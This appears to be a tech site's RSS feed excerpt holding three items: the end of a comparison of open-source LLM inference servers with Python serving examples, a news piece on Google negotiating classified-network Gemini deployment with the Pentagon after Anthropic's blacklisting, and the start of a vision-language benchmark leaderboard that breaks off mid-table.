<p>DeepSpeed-MII provides inference optimizations from Microsoft Research: blocked KV caching, continuous batching, Dynamic SplitFuse, tensor parallelism, and INT8/ZeroQuant quantization. It supports 37,000+ models and claims up to 2.5x higher throughput than vLLM in its own benchmarks.</p>
<p>The honest assessment: MII's benchmarks predate vLLM's v0.6+ performance improvements, and independent 2026 comparisons show it behind SGLang and current vLLM. It remains relevant for teams already on the Azure/DeepSpeed stack. For greenfield deployments, vLLM or SGLang is the better default.</p>
<hr>
<h2 id="triton-inference-server---the-enterprise-orchestration-layer">Triton Inference Server - The Enterprise Orchestration Layer</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/triton-inference-server/server">triton-inference-server/server</a> | <strong>License</strong>: BSD 3-Clause</p>
<p>NVIDIA Triton is a general-purpose, multi-framework model server, not an LLM inference engine itself. Its value in this comparison is as the production deployment layer on top of TensorRT-LLM. The TensorRT-LLM backend for Triton adds in-flight batching, paged attention, LoRA support, and leader/orchestrator multi-GPU modes.</p>
<p>Triton handles the enterprise concerns: multi-model serving, health checks, performance metrics, ensemble pipelines, and gRPC/HTTP APIs. If your production stack already uses Triton for computer vision or NLP models, adding LLM serving via the TRT-LLM backend is the natural path.</p>
<p><img src="/images/tools/best-open-source-llm-inference-servers-2026-network.jpg" alt="Network infrastructure powering distributed LLM serving">
<em>Multi-GPU inference deployments rely on high-bandwidth networking between nodes - the infrastructure layer matters as much as the serving framework.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="ray-serve---orchestration-not-a-server">Ray Serve - Orchestration, Not a Server</h2>
<p><strong>Docs</strong>: <a href="https://docs.ray.io/en/latest/serve/llm/index.html">docs.ray.io/en/latest/serve/llm/index.html</a> | <strong>License</strong>: Apache 2.0</p>
<p>Ray Serve isn't an inference engine - it's a programmable orchestration layer that wraps engines like vLLM. The standalone ray-llm repository was archived in favor of the built-in <code>ray.serve.llm</code> API (available since Ray 2.44), which handles auto-scaling, load balancing, streaming responses, and multi-model routing.</p>
<p>Ray Serve's superpower is disaggregated serving: prefill and decode phases can be split across separate actor pools, so each can be scaled and tuned for better GPU use. Teams serving multiple models or needing fine-grained traffic control will find it valuable. Teams serving a single model with predictable load should just run vLLM directly.</p>
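<p>A rough sketch of the built-in <code>ray.serve.llm</code> API with placeholder model names - field names follow the Ray Serve LLM docs and may shift between Ray releases:</p>
<pre><code class="language-python"># Sketch: serve an OpenAI-compatible endpoint through Ray Serve, with vLLM
# as the underlying engine. Autoscaling bounds and model ids are placeholders.
from ray import serve
from ray.serve.llm import LLMConfig, build_openai_app

llm_config = LLMConfig(
    model_loading_config={
        "model_id": "llama-3.1-8b",  # name exposed to clients
        "model_source": "meta-llama/Llama-3.1-8B-Instruct",
    },
    deployment_config={
        "autoscaling_config": {"min_replicas": 1, "max_replicas": 4},
    },
)

app = build_openai_app({"llm_configs": [llm_config]})
serve.run(app)  # exposes /v1/chat/completions on the Serve HTTP port
</code></pre>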
<hr>
<h2 id="full-comparison-table">Full Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Server</th>
          <th>License</th>
          <th>OpenAI API</th>
          <th>Multi-GPU</th>
          <th>Quantization</th>
          <th>Spec. Decode</th>
          <th>Prefix Cache</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>vLLM</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP + PP</td>
          <td>FP8, AWQ, GPTQ, GGUF, INT4/8</td>
          <td>Yes (EAGLE, n-gram)</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>SGLang</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP + PP + EP</td>
          <td>FP4/FP8/INT4/AWQ/GPTQ</td>
          <td>Yes</td>
          <td>Yes (RadixAttention)</td>
      </tr>
      <tr>
          <td>TensorRT-LLM</td>
          <td>Apache 2.0</td>
          <td>Via Triton</td>
          <td>TP + PP</td>
          <td>FP4, FP8, INT8</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>TGI</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP</td>
          <td>FP8, AWQ, GPTQ, EETQ</td>
          <td>Yes</td>
          <td>Limited</td>
      </tr>
      <tr>
          <td>llama.cpp</td>
          <td>MIT</td>
          <td>Yes</td>
          <td>Limited</td>
          <td>1.5- to 8-bit GGUF, k-quants</td>
          <td>No</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Ollama</td>
          <td>MIT</td>
          <td>Yes</td>
          <td>No</td>
          <td>GGUF (via llama.cpp)</td>
          <td>No</td>
          <td>Limited</td>
      </tr>
      <tr>
          <td>LMDeploy</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP</td>
          <td>FP8, INT4/8, AWQ</td>
          <td>No</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>MLC-LLM</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP</td>
          <td>FP8, INT4, AWQ, GPTQ</td>
          <td>No</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Aphrodite</td>
          <td>AGPL-3.0</td>
          <td>Yes + KoboldAI</td>
          <td>TP + PP</td>
          <td>FP2-FP12, AWQ, GPTQ, GGUF, + 10 more</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>DeepSpeed-MII</td>
          <td>Apache 2.0</td>
          <td>Partial</td>
          <td>TP</td>
          <td>INT8, FP16</td>
          <td>No</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Triton Server</td>
          <td>BSD 3-Clause</td>
          <td>Via backends</td>
          <td>TP + PP</td>
          <td>Via TRT-LLM</td>
          <td>Via TRT-LLM</td>
          <td>Via TRT-LLM</td>
      </tr>
      <tr>
          <td>Ray Serve</td>
          <td>Apache 2.0</td>
          <td>Via vLLM</td>
          <td>TP + PP</td>
          <td>Via underlying engine</td>
          <td>Via engine</td>
          <td>Via engine</td>
      </tr>
  </tbody>
</table>
<p><em>TP = Tensor Parallelism, PP = Pipeline Parallelism, EP = Expert Parallelism</em></p>
<hr>
<h2 id="use-case-decision-matrix">Use-Case Decision Matrix</h2>
<p><strong>You want the safest default for production serving</strong> - start with vLLM. Broadest model support, active community, Apache 2.0, and solid documentation. Switch to SGLang once you've confirmed your workloads are prefix-heavy.</p>
<p><strong>Your workload involves RAG or multi-turn agents</strong> - switch to SGLang. The RadixAttention prefix caching compounds across requests in ways that vLLM's implementation doesn't match. For <a href="/tools/best-ai-rag-tools-2026">RAG tool integrations</a>, this is often a 20-30% cost reduction in practice.</p>
<p><strong>You're running a fixed high-traffic model on H100/B200</strong> - TensorRT-LLM delivers the best throughput numbers. Accept the 28-minute compilation as a one-time build cost per model version.</p>
<p><strong>You need CPU inference, Apple Silicon, or air-gapped deployments</strong> - llama.cpp is the right engine. Ollama adds a friendlier interface. Neither scales to high concurrent load.</p>
<p><strong>You're optimizing for low-precision inference on a budget</strong> - LMDeploy for Int4 on A100/A800, especially for InternLM models or any workload where the lowest TTFT at low precision is the priority.</p>
<p><strong>You need edge, mobile, or browser deployment</strong> - MLC-LLM is the only viable open-source option.</p>
<p><strong>You're on the Azure/DeepSpeed ecosystem</strong> - DeepSpeed-MII integrates naturally and offers solid performance within that stack.</p>
<p><strong>You need structured JSON outputs at scale</strong> - SGLang with xGrammar. The compiled grammar caching is unique in the space; a request sketch follows this decision matrix.</p>
<p><strong>You're running many models or need routing/autoscaling</strong> - Ray Serve as the orchestration layer, wrapping vLLM or SGLang underneath. Check the <a href="/leaderboards/ai-speed-latency-leaderboard">AI speed and latency leaderboard</a> for how these stack up under real routing conditions.</p>
<p><strong>You want to benchmark your own hardware</strong> - <a href="/tools/llmfit-find-best-llm-for-your-hardware">LLMFit</a> is a useful starting point for calibrating expected throughput against your available GPU fleet.</p>
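<p>For the structured-output case, here is a hedged sketch of the request shape, assuming the server (SGLang here, though recent vLLM builds document the same field) accepts the OpenAI-style <code>json_schema</code> response format; URL, model, and schema are placeholders:</p>
<pre><code class="language-python"># Sketch: constrained JSON generation via the OpenAI-compatible API.
# The server compiles the schema into a grammar (xGrammar in SGLang's case)
# and caches it, so repeated extractions with the same schema stay cheap.
from openai import OpenAI

client = OpenAI(base_url="http://localhost:30000/v1", api_key="EMPTY")

invoice_schema = {
    "type": "object",
    "properties": {
        "vendor": {"type": "string"},
        "total": {"type": "number"},
        "currency": {"type": "string"},
    },
    "required": ["vendor", "total", "currency"],
}

resp = client.chat.completions.create(
    model="meta-llama/Llama-3.1-8B-Instruct",  # placeholder model id
    messages=[{"role": "user", "content": "Extract the invoice fields: ACME Corp, 1240.50 EUR."}],
    response_format={
        "type": "json_schema",
        "json_schema": {"name": "invoice", "schema": invoice_schema},
    },
)
print(resp.choices[0].message.content)  # output is constrained to the schema
</code></pre>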
<div class="pull-quote">
<p>SGLang's RadixAttention uses a fundamentally different caching model from vLLM's prefix caching - the radix tree finds and reuses shared prefixes of any length automatically, with no manual prompt structuring required.</p>
</div>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="is-vllm-still-the-best-inference-server-in-2026">Is vLLM still the best inference server in 2026?</h3>
<p>vLLM is the most flexible default, but SGLang and TensorRT-LLM beat it on raw throughput. The right choice depends on workload: vLLM for broad model support, SGLang for prefix-heavy or structured output workloads, TRT-LLM for maximum single-model throughput.</p>
<h3 id="should-i-migrate-away-from-tgi">Should I migrate away from TGI?</h3>
<p>Yes, for anything new. TGI entered maintenance mode on December 11, 2025, and no new features will be added. Both vLLM and SGLang are drop-in API replacements serving the same OpenAI-compatible endpoints.</p>
<h3 id="does-sglang-support-all-the-same-models-as-vllm">Does SGLang support all the same models as vLLM?</h3>
<p>Not yet. vLLM supports 200+ HuggingFace architectures; SGLang covers fewer. For the most recently released or niche models, vLLM is more likely to have support. Check the SGLang docs for the current model list before committing.</p>
<h3 id="when-does-tensorrt-llm-make-sense">When does TensorRT-LLM make sense?</h3>
<p>When you are serving a fixed model at sustained high concurrency on NVIDIA H100 or B200 hardware, and the 28-minute compilation cost is amortized over millions of requests. Not suitable for experimentation or multi-model serving.</p>
<h3 id="is-ollama-suitable-for-production">Is Ollama suitable for production?</h3>
<p>At low concurrency (under 4-8 simultaneous users), yes. Under higher load, response times degrade sharply and throughput plateaus. For customer-facing production serving, use vLLM or SGLang.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://github.com/vllm-project/vllm">vLLM GitHub (v0.19.0)</a></li>
<li><a href="https://github.com/sgl-project/sglang">SGLang GitHub (v0.5.10)</a></li>
<li><a href="https://github.com/NVIDIA/TensorRT-LLM">NVIDIA TensorRT-LLM GitHub</a></li>
<li><a href="https://github.com/huggingface/text-generation-inference">HuggingFace TGI GitHub</a></li>
<li><a href="https://github.com/ggml-org/llama.cpp">llama.cpp GitHub</a></li>
<li><a href="https://github.com/InternLM/lmdeploy">InternLM LMDeploy GitHub</a></li>
<li><a href="https://github.com/mlc-ai/mlc-llm">MLC-LLM GitHub</a></li>
<li><a href="https://github.com/aphrodite-engine/aphrodite-engine">Aphrodite Engine GitHub</a></li>
<li><a href="https://github.com/deepspeedai/DeepSpeed-MII">DeepSpeed-MII GitHub</a></li>
<li><a href="https://github.com/triton-inference-server/server">Triton Inference Server GitHub</a></li>
<li><a href="https://docs.ray.io/en/latest/serve/llm/index.html">Ray Serve LLM Docs</a></li>
<li><a href="https://www.spheron.network/blog/vllm-vs-tensorrt-llm-vs-sglang-benchmarks/">Spheron vLLM vs TRT-LLM vs SGLang H100 Benchmarks</a></li>
<li><a href="https://blog.premai.io/vllm-vs-sglang-vs-lmdeploy-fastest-llm-inference-engine-in-2026/">Prem AI: vLLM vs SGLang vs LMDeploy 2026</a></li>
<li><a href="https://blog.premai.io/llm-inference-servers-compared-vllm-vs-tgi-vs-sglang-vs-triton-2026/">Prem AI: LLM Inference Servers Compared 2026</a></li>
<li><a href="https://www.linkedin.com/posts/lysandredebut_text-generation-inference-is-now-in-maintenance-activity-7404903648062885888-WK42">Lysandre Debut - TGI Maintenance Mode Announcement</a></li>
<li><a href="https://docs.vllm.ai/en/v0.8.1/design/automatic_prefix_caching.html">vLLM Automatic Prefix Caching Docs</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-open-source-llm-inference-servers-2026_hu_4fcb4a6e31f5d3a3.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-open-source-llm-inference-servers-2026_hu_4fcb4a6e31f5d3a3.jpg" width="1200" height="675"/></item><item><title>Google Bids for Pentagon&amp;#39;s Classified Gemini Contract</title><link>https://awesomeagents.ai/news/google-pentagon-gemini-classified-talks/</link><pubDate>Fri, 17 Apr 2026 13:45:50 +0200</pubDate><guid>https://awesomeagents.ai/news/google-pentagon-gemini-classified-talks/</guid><description><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/73S0rVFmsa1ehnJXOnk6Sv?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Google is in active negotiations with the Department of Defense to deploy Gemini AI on classified networks, according to The Information, which cited two people with direct knowledge of the talks. If finalized, the deal would take Google well beyond its existing unclassified footprint at the Pentagon and into the sensitive data environments where Anthropic's Claude was rolled out before the company was <a href="/news/anthropic-sues-pentagon-blacklist/">blacklisted in March</a>.</p>]]></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/73S0rVFmsa1ehnJXOnk6Sv?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Google is in active negotiations with the Department of Defense to deploy Gemini AI on classified networks, according to The Information, which cited two people with direct knowledge of the talks. If finalized, the deal would take Google well beyond its existing unclassified footprint at the Pentagon and into the sensitive data environments where Anthropic's Claude was rolled out before the company was <a href="/news/anthropic-sues-pentagon-blacklist/">blacklisted in March</a>.</p>
<p>The talks are the clearest sign yet that the Anthropic fallout has reshuffled the government AI market in ways that benefit Google directly.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Google is negotiating classified-network access for Gemini at the Pentagon, per The Information</li>
<li>The proposed contract covers &quot;all lawful purposes&quot; - but Google is pushing for explicit bans on domestic mass surveillance and autonomous weapons without human control</li>
<li>Anthropic was blacklisted in March for holding those same positions; Google is now trying to win the same restrictions through negotiation rather than confrontation</li>
<li>No dollar amount has been disclosed and no deal has been signed</li>
</ul>
</div>
<h2 id="the-proposed-terms">The Proposed Terms</h2>
<p>The Pentagon has pushed all AI vendors to accept contracts covering &quot;all lawful purposes&quot; - language designed to give the military maximum flexibility over how it uses AI tools. Anthropic refused to remove carve-outs for domestic mass surveillance and fully autonomous weapons systems. The Pentagon responded by <a href="/news/anthropic-sues-pentagon-blacklist/">designating Anthropic a supply chain risk</a> on March 4 - the first American company ever to receive that designation.</p>
<p>Google's proposed terms in these negotiations reportedly include the same two restrictions: Gemini would be prohibited from use in domestic mass surveillance and from controlling autonomous weapons without appropriate human oversight.</p>
<blockquote>
<p>&quot;The Pentagon will continue to rapidly deploy frontier AI capabilities to the warfighter through strong industry partnerships across all classification levels.&quot;</p></blockquote>
<p>That statement, from a Pentagon spokesperson, didn't confirm the Google talks specifically. But the phrase &quot;all classification levels&quot; carries its own weight. Pentagon CTO Emil Michael made the direction explicit in March: &quot;I have high confidence they're going to be a great partner on all networks.&quot; Networks, plural. The unclassified GenAI.mil deployment, where <a href="/news/google-gemini-agents-pentagon-workforce/">Google already serves 3 million Pentagon workers</a>, was the first step.</p>
<h3 id="how-google-got-here">How Google Got Here</h3>
<p>Google's path to this negotiation runs through a deliberate reversal of its own stated principles.</p>
<p>In 2018, roughly 3,100 Google employees signed a letter demanding the company exit Project Maven, a DoD contract using machine learning to analyze drone footage. Google walked away when the contract expired in 2019. That decision was treated internally as a commitment: Google wouldn't build AI for warfare.</p>
<p>By early 2025, Google had quietly removed those restrictions. The company signed a $200 million prototype contract with the Pentagon in July 2025, alongside Anthropic, OpenAI, and xAI. In August it announced Gemini for Government. In December it became the first enterprise AI provider on GenAI.mil at launch. By March 2026, eight pre-built Gemini-powered agents were running across the unclassified tier, with 1.2 million unique users already on the platform.</p>
<p>The classified-network talks are the logical next step in that progression.</p>
<p><img src="/images/news/google-pentagon-gemini-classified-talks-pichai.jpg" alt="Sundar Pichai, Google CEO, at a 2023 government meeting">
<em>Sundar Pichai at a 2023 regulatory meeting. Google's leadership made a calculated decision to re-enter military AI after the 2018 Project Maven retreat.</em>
<small>Source: commons.wikimedia.org</small></p>
<h2 id="who-benefits-who-pays">Who Benefits, Who Pays</h2>
<table>
  <thead>
      <tr>
          <th>Stakeholder</th>
          <th>Impact</th>
          <th>Timeline</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><strong>Google</strong></td>
          <td>Expands Gemini into classified defense markets; validates military AI strategy after 2018 Maven retreat</td>
          <td>If deal closes: 2026</td>
      </tr>
      <tr>
          <td><strong>Pentagon</strong></td>
          <td>Gets a replacement for Anthropic on classified networks, maintains vendor diversification</td>
          <td>Six-month Anthropic phase-out underway</td>
      </tr>
      <tr>
          <td><strong>Anthropic</strong></td>
          <td>Loses classified-network business to its main competitor; legal battle continues</td>
          <td>Preliminary injunction holds but appeal failed April 8</td>
      </tr>
      <tr>
          <td><strong>OpenAI</strong></td>
          <td>Already signed its own DoW agreement; competes with Google for classified-tier budget</td>
          <td>Ongoing</td>
      </tr>
      <tr>
          <td><strong>Google employees</strong></td>
          <td>More than 100 signed an internal letter opposing military Gemini use; 430+ joined a joint Google-OpenAI letter</td>
          <td>April 2026</td>
      </tr>
  </tbody>
</table>
<h3 id="companies">Companies</h3>
<p>Google's classified-network pitch puts it in direct competition with Microsoft, which has long served the intelligence community through dedicated Azure Government regions, and with Palantir, whose tools served as the conduit for classified Claude deployments before the Anthropic blacklisting. OpenAI signed its own Department of War agreement within hours of the Anthropic designation - an approach its own CEO later described as &quot;opportunistic and sloppy&quot; in internal communications reported by The Atlantic.</p>
<p>The Pentagon's stated strategy is deliberate vendor diversification. That makes the Google talks less about winner-takes-all and more about which vendors are willing to operate within terms the DoD will accept.</p>
<h3 id="users">Users</h3>
<p>Inside Google, the atmosphere is different from 2018. Employees who oppose military AI use are still organizing - the 100-person internal letter and the broader 430-person joint letter with OpenAI workers are real acts of dissent - but those involved acknowledge the company's direction has already changed. The fight has shifted from &quot;get Google out of defense&quot; to &quot;force Google to maintain limits.&quot;</p>
<p>Whether those limits survive the negotiation is the open question.</p>
<h3 id="competitors">Competitors</h3>
<p>The Anthropic situation offers a useful data point. Pentagon CTO Emil Michael's public criticism of Anthropic's position was direct: &quot;What we're not going to do is let any one company dictate a new set of policies above and beyond what Congress has passed.&quot; The framing cast Anthropic's safety restrictions as anti-democratic overreach.</p>
<p>Google is attempting to win the same restrictions - no mass surveillance, no autonomous weapons - through negotiation rather than as non-negotiable policy. If the Pentagon accepts those terms from Google, it'll be hard to argue the Anthropic blacklisting was ever really about the substance of the restrictions.</p>
<p><img src="/images/news/google-pentagon-gemini-classified-talks-datacenter.jpg" alt="Google datacenter facility in The Dalles, Oregon">
<em>Google's cloud infrastructure will form the backbone of any classified Gemini deployment. The Pentagon already routes 1.2 million users through unclassified Gemini services.</em>
<small>Source: commons.wikimedia.org</small></p>
<h2 id="the-anthropic-parallel">The Anthropic Parallel</h2>
<p>The <a href="/news/trump-administration-anthropic-paradox-ban-and-deploy/">Trump administration's handling of Anthropic</a> has been contradictory enough that some observers question whether the blacklisting was ever primarily about safety policy. On March 4, the Pentagon designated Anthropic a supply chain risk. Within hours it signed a new agreement with OpenAI. The same week, Treasury Secretary Bessent was meeting with Wall Street banks to encourage Claude adoption in financial services.</p>
<p><a href="/news/anthropic-wins-injunction-pentagon-ban/">Anthropic's injunction lawsuit</a> secured a preliminary block on the ban's enforcement - a federal judge found evidence of First Amendment retaliation. But Anthropic lost an appeals court bid on April 8 to extend that protection pending the full litigation, leaving the legal picture split. Classified Claude deployments, which ran through Palantir and AWS, remain in a months-long phase-out.</p>
<p>Google's classified-network talks advance during that phase-out. The timing isn't subtle.</p>
<hr>
<h2 id="what-happens-next">What Happens Next</h2>
<p>No dollar figure has been disclosed for the classified-network agreement, and no deal has been confirmed as of publication. The existing July 2025 Pentagon contracts paid up to $200 million each to Google, Anthropic, OpenAI, and xAI for prototype development. A classified-network extension would likely be a separate procurement.</p>
<p>The more consequential variable is the negotiated safeguards. If the Pentagon accepts Google's proposed restrictions on mass surveillance and autonomous weapons, the Anthropic blacklisting looks less like a principled line and more like a negotiating failure. That outcome would validate Anthropic's underlying positions while punishing the company for how it defended them - a distinction unlikely to comfort either side.</p>
<p>The <a href="/news/altman-pentagon-deal-sloppy-1-5m-boycott/">OpenAI-Google competition for the Pentagon's AI budget</a> is now moving into classified territory. The next milestone is whether Emil Michael signs a deal that includes the safeguard language Google is pushing, or whether the Pentagon holds the same line it drew against Anthropic.</p>
<p><strong>Sources:</strong> <a href="https://www.theinformation.com/">The Information (original report, paywalled)</a>, <a href="https://www.newsweek.com/pentagon-weighs-googles-gemini-ai-for-military-use-anthropic-fallout-11839175">Newsweek - Pentagon Weighs Google Gemini After Anthropic Fallout</a>, <a href="https://www.bangordailynews.com/2026/04/16/politics/washington/google-pentagon-gemini-ai-negotiations/">Reuters/Bangor Daily News - Google Pentagon Negotiations</a>, <a href="https://winbuzzer.com/2026/03/11/google-deploys-gemini-ai-agents-pentagon-dod-partnership-xcxwbn/">Winbuzzer - Google Deploys Gemini Agents at Pentagon</a>, <a href="https://winbuzzer.com/2026/04/05/google-workers-find-its-a-different-era-for-activism-on-military-ai-xcxwbn/">Winbuzzer - Google Workers and Military AI Activism</a>, <a href="https://sfstandard.com/opinion/2026/04/03/google-maven-anthropic-pentagon-ai/">SF Standard - Diane Greene Op-Ed on Maven</a>, <a href="https://www.cnbc.com/2026/03/04/pentagon-blacklist-anthropic-defense-tech-claude.html">CNBC - Pentagon Blacklists Anthropic</a>, <a href="https://www.cnbc.com/2026/04/08/anthropic-pentagon-court-ruling-supply-chain-risk.html">CNBC - Anthropic Loses Appeals Court Bid</a></p>
]]></content:encoded><dc:creator>Daniel Okafor</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/google-pentagon-gemini-classified-talks_hu_17a09eb935ca281d.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/google-pentagon-gemini-classified-talks_hu_17a09eb935ca281d.jpg" width="1200" height="675"/></item><item><title>Vision-Language Benchmarks: Image Reasoning Ranked</title><link>https://awesomeagents.ai/leaderboards/vision-language-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 13:27:00 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/vision-language-benchmarks-leaderboard/</guid><description>&lt;p>If you've read our &lt;a href="/leaderboards/multimodal-benchmarks-leaderboard/">multimodal benchmarks leaderboard&lt;/a>, you've already seen the summary view - top models, aggregate rankings, how MMMU-Pro and Video-MMMU stack up. This leaderboard covers narrower but harder ground: image reasoning and document understanding specifically, where the tasks are interpreting charts from scientific papers, reading scanned invoices, solving math problems from geometry diagrams, and recognizing structure in complex visual layouts. Audio, video, and general multimodal capability sit elsewhere. The question here is whether a model can actually think about what it sees in a still image.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>If you've read our <a href="/leaderboards/multimodal-benchmarks-leaderboard/">multimodal benchmarks leaderboard</a>, you've already seen the summary view - top models, aggregate rankings, how MMMU-Pro and Video-MMMU stack up. This leaderboard covers narrower but harder ground: image reasoning and document understanding specifically, where the tasks are interpreting charts from scientific papers, reading scanned invoices, solving math problems from geometry diagrams, and recognizing structure in complex visual layouts. Audio, video, and general multimodal capability sit elsewhere. The question here is whether a model can actually think about what it sees in a still image.</p>
<p>The benchmarks in this space have grown substantially more demanding since 2023. The original MMMU was largely saturated by mid-2025. ChartQA and DocVQA, while still useful, are now cleared by most frontier models above 90%. The interesting signal in 2026 comes from MMMU-Pro (harder exam questions, 10-option answers), CharXiv-R (realistic scientific charts from arXiv papers), and OCRBench v2 (bilingual text recognition with 31 task scenarios). These are the benchmarks where gaps between models still tell you something.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Claude Opus 4.7 leads CharXiv-R at 91.0% - the strongest chart reasoning result from any currently available model</li>
<li>Gemini 3.1 Pro tops MMMU-Pro at 82%, with strong document and chart scores across the board</li>
<li>Open-source picks: Qwen3-VL and InternVL3 both clear 95% on DocVQA and lead the community on RealWorldQA and BLINK</li>
</ul>
</div>
<h2 id="the-benchmarks-explained">The Benchmarks Explained</h2>
<h3 id="mmmu-and-mmmu-pro">MMMU and MMMU-Pro</h3>
<p>MMMU (Massive Multi-discipline Multimodal Understanding) contains 11,500 college-level problems across 30 subjects, each requiring understanding of images such as figures, charts, diagrams, and photographs. The original version is no longer useful for frontier model differentiation - top models score above 80% and gaps have compressed to noise.</p>
<p>MMMU-Pro matters more now. It expanded the answer option count from 4 to 10 (reducing random guessing value), removed questions answerable without reading the image, and added harder multi-step problems. Where top models scored 75% on the original, they score 65-82% on MMMU-Pro. The floor rose but the ceiling spread back out, which is exactly what you want from an evaluation benchmark.</p>
<h3 id="mathvista">MathVista</h3>
<p>MathVista tests mathematical reasoning in visual contexts: bar charts with partial data, geometry diagrams with unlabeled angles, function plots that require inference, statistical tables where you need to calculate something that isn't written. It combines 28 existing visual math datasets with three new ones. The test isn't just vision - it requires the model to correctly read the visual element and then perform non-trivial math.</p>
<h3 id="chartqa-and-charxiv">ChartQA and CharXiv</h3>
<p>ChartQA asks questions about charts drawn in fairly clean presentation styles. It's scored at 90%+ by most frontier models today, which means it's best used to identify weak performers rather than rank the top tier.</p>
<p>CharXiv is meaningfully harder. The charts come from actual arXiv papers - the kind with dual y-axes, inset subplots, color-coded multi-series data, unconventional labeling, and statistical notation. CharXiv-R specifically assesses reasoning questions that require synthesizing information across the full chart, not just reading off a number. Human performance sits at 80.5%. Top models reached that range only in late 2025.</p>
<h3 id="docvqa">DocVQA</h3>
<p>DocVQA uses scanned or photographed documents - forms, invoices, contracts, research papers with tables - and asks free-form questions about their content. The challenge is handling poor image quality, varied fonts, complex layouts, and text that wraps around form fields. It tests a capability with direct enterprise value: automated document processing.</p>
<h3 id="ocrbench-v2">OCRBench v2</h3>
<p>OCRBench v2 is a sizable upgrade over the original, expanding to 10,000 human-verified question-answer pairs across 31 scenario types including handwritten text, mathematical notation, multilingual content, and degraded documents. English OCR leader as of Q1 2026 is Seed1.6-vision at 62.2%, which tells you this is still a hard benchmark with real headroom.</p>
<h3 id="ai2d">AI2D</h3>
<p>AI2D tests scientific diagram comprehension - the kind of figures found in textbooks and biology papers showing cell structures, geological processes, and physical systems. Most frontier models now clear 89-94%, placing this benchmark in the same category as ChartQA for differentiation purposes. It's useful for identifying capable models at lower capability tiers.</p>
<h3 id="blink">BLINK</h3>
<p>BLINK reformats 14 classic computer vision tasks - relative depth, visual correspondence, spatial reasoning, multi-view geometry - into 3,807 multiple-choice questions. These are perceptual tasks that humans solve almost instantly but models struggle with. The benchmark's name is literal: the tasks should take humans a blink. When the original BLINK launched, GPT-4V scored 51% while humans averaged 95%. The gap has since closed substantially, but BLINK remains a good test of genuine perceptual grounding rather than pattern matching from training data.</p>
<h3 id="realworldqa">RealWorldQA</h3>
<p>Released by xAI with Grok-1.5 Vision, RealWorldQA uses over 700 images taken from vehicles and real-world outdoor scenarios, each paired with a spatial reasoning question. It tests the kind of situational awareness relevant to robotics and autonomous systems, not academic benchmarks. The question set is small enough that statistical noise is a concern, but it adds a practical dimension that most other benchmarks lack.</p>
<hr>
<h2 id="rankings-table">Rankings Table</h2>
<p>Scores reflect the best publicly reported results as of April 2026. Where a model has multiple evaluation configurations (e.g., with vs. without extended thinking), the higher result is listed. Scores marked with a dash were not publicly reported at time of writing.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>MMMU-Pro</th>
          <th>MathVista</th>
          <th>CharXiv-R</th>
          <th>DocVQA</th>
          <th>ChartQA</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 3.1 Pro</td>
          <td>Google DeepMind</td>
          <td><strong>82%</strong></td>
          <td>75%</td>
          <td>-</td>
          <td>92%</td>
          <td>90%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>81%</td>
          <td>78.4%</td>
          <td>-</td>
          <td><strong>95%</strong></td>
          <td><strong>92.5%</strong></td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4.7</td>
          <td>Anthropic</td>
          <td>-</td>
          <td>-</td>
          <td><strong>91.0%</strong></td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Gemini 3 Pro</td>
          <td>Google DeepMind</td>
          <td>81%</td>
          <td>82.3%</td>
          <td>81.4%</td>
          <td>89%</td>
          <td>89.1%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>77.3%</td>
          <td>-</td>
          <td>77.4%</td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>6</td>
          <td>GPT-5.2</td>
          <td>OpenAI</td>
          <td>79.5%</td>
          <td>-</td>
          <td>82.1%</td>
          <td>-</td>
